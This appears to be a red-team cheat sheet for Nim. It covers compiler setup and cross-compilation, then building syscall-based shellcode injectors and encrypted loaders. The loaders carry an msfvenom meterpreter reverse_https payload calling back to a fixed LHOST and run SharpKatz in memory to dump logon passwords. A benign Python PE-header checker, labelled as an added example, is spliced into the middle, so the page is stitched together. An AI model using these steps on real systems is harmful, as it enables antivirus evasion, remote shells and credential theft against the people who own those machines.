Nim

Install

Windows:

Linux:

$ sudo apt install mingw-w64 -y
$ sudo apt install nim -y
Or
$ curl https://nim-lang.org/choosenim/init.sh -sSf | sh

Dependencies:

Nim > nimble install winim nimcrypto zippy

Compilation

Basic:

Nim > nim c program.nim

To keep the console window from popping up:

Nim > nim c --app:gui program.nim

For the smallest binary size:

Nim > nim c -d:danger -d:strip --opt:size --passC=-flto --passL=-flto program.nim

For Windows on Linux:

$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc program.nim

Add the needed relocation section to the resulting executable (from Windows):

Nim > nim c --passL:-Wl,--dynamicbase,--export-all-symbols program.nim
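
Whether a built executable actually carries the relocation data those linker flags ask for can be read straight from its PE headers, which is also a quick triage check for an analyst. This is an added example, not code from the original page; the names pe_reloc_info and build_sample are made up here, and the sample input is a constructed header, not a real binary:

```python
import struct

RELOCS_STRIPPED = 0x0001  # COFF Characteristics: IMAGE_FILE_RELOCS_STRIPPED
DYNAMIC_BASE = 0x0040     # DllCharacteristics bit set by the linker's --dynamicbase
BASERELOC_DIR = 5         # data directory index: IMAGE_DIRECTORY_ENTRY_BASERELOC

def pe_reloc_info(data: bytes) -> dict:
    """Read the relocation-related header fields of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = pe_off + 4
    _, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    dirs = opt + (112 if magic == 0x20B else 96)  # start of data directories
    (ndirs,) = struct.unpack_from("<I", data, dirs - 4)
    size = 0
    if ndirs > BASERELOC_DIR:
        _, size = struct.unpack_from("<II", data, dirs + 8 * BASERELOC_DIR)
    sect = opt + opt_size  # section table follows the optional header
    names = [data[sect + 40 * i:sect + 40 * i + 8].rstrip(b"\0") for i in range(nsect)]
    return {"dynamic_base": bool(dll_chars & DYNAMIC_BASE),
            "relocs_stripped": bool(chars & RELOCS_STRIPPED),
            "reloc_dir_size": size,
            "reloc_section": b".reloc" in names}

def build_sample(dynamic_base: bool, with_reloc: bool) -> bytes:
    """Constructed PE32+ headers only (not a runnable program), used as demo input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    chars = 0x0022 | (0 if with_reloc else RELOCS_STRIPPED)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, chars)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<H", opt, 70, DYNAMIC_BASE if dynamic_base else 0)
    struct.pack_into("<I", opt, 108, 16)  # NumberOfRvaAndSizes
    if with_reloc:
        struct.pack_into("<II", opt, 112 + 8 * BASERELOC_DIR, 0x3000, 12)
    name = b".reloc" if with_reloc else b".text"
    return dos + b"PE\0\0" + coff + bytes(opt) + name.ljust(40, b"\0")

if __name__ == "__main__":
    print(pe_reloc_info(build_sample(True, True)))
    print(pe_reloc_info(build_sample(False, False)))
```

For a file on disk, pass its bytes to pe_reloc_info; a truncated header raises struct.error rather than returning partial results.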

Inject Shellcode

NimlineWhispers

How-to:

  1. Generate a Nim header with syscall definitions (function names randomized): python3 NimlineWhispers.py --randomise

  2. Modify the shellcode_bin.nim template to match the new function names.

  3. Generate shellcode of your choice, put it into the template and compile the binary: nim c -d=mingw --app=console --cpu=amd64 shellcode_bin.nim

Encrypted

 # Generate a shellcode
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.16.18 LPORT=443 -e x64/xor -b '\x00' -f csharp
 # Copy the shellcode into the 1st template and compile
$ nim c encrypt_shellcode.nim
 # Encrypt the shellcode and write contents into a file
$ ./encrypt_shellcode 'Passw0rd!' b64.txt
 # Copy encrypted shellcode into the 2nd template and compile
$ cat b64.txt | xclip -i -sel c
$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:danger -d:strip --opt:size --passC=-flto --passL=-flto encrypted_shellcode_loader_syscalls.nim

Execute C# Assemblies

$ pwsh -exec bypass
PS > . ./CSharpToNimByteArray.ps1
PS > CSharpToNimByteArray -inputfile csharp.exe
Nim > nim c --passL:-Wl,--dynamicbase,--export-all-symbols execute_assembly_bin.nim

Encrypted

$ nim c encrypt_assembly.nim
$ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:danger -d:strip --opt:size --passC=-flto --passL=-flto encrypted_assembly_loader.nim
$ ./encrypt_assembly 'Passw0rd!' SharpKatz.exe b64.txt
Cmd > .\encrypted_assembly_loader.exe Passw0rd! b64.txt --Command logonpasswords

Tools & Packers
